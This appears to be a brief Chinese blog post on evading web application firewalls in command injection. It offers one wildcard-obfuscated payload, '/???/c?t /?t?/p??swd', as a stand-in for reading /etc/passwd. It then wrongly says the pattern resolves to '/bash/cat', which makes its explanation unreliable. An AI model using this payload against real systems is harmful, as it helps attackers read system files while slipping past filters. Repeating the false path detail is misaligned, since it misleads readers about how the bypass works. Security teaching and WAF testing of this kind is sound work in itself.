Lonely Sit
文章17
标签24
分类3
命令注入之Web应用防火墙绕过技巧

命令注入之Web应用防火墙绕过技巧

使用通配符绕过防火墙规则 例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd /???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd